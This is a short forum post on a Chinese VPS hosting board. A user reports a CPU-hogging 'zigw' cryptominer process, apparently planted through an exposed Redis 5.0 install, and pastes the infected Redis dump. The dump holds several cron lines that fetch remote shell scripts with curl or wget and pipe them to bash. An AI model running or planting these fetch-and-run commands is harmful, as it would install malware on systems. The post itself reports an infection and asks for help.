全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 1766|回复: 0

[Windows VPS] zigw这个进程你们遇到过吗

[复制链接]
发表于 2018-11-14 10:02:14 | 显示全部楼层 |阅读模式
刚才突然发现小鸡cpu占用有点不正常,一看是zigw这个进程吃了96%
把这个进程杀掉还有个NanoWatch进程
有没有人遇到过
网上查说是挖矿病毒,好像是从redis侵入的,我昨天刚用bt装了个redis5.0
就昨天晚上使用了一下,今早赶紧给关了

这个好像是相关的一个文件

QQ20181114-095608@2x.png (42.95 KB, 下载次数: 2)

  1. REDIS0009�      redis-ver5.0.0�
  2. �edis-bits�@�ctime�M}�[used-mem
  3. aof-preamble���Back2@I
  4. */5 * * * * wget -O .cmd http://c.21-2n.com:43768/shz.sh && bash .cmd
  5.         weaponZ@_
  6. */7 * * * * wget -q -O- https://pixeldra.in/api/download/nbf6QU --no-check-certificate | bash
  7. Back3?  
  8. */13 * * * * url -fsSL http://c.21-2n.com:43768/shz.sh | sh
  9.         Back1=  
  10. * * * * * curl -fsSL http://c.21-2n.com:43768/shz.sh | sh
  11.         weaponX@H
  12. */5 * * * * curl -fsSLk https://pixeldra.in/api/download/nbf6QU | bash
复制代码
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2025-12-18 21:56 , Processed in 0.060967 second(s), 11 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表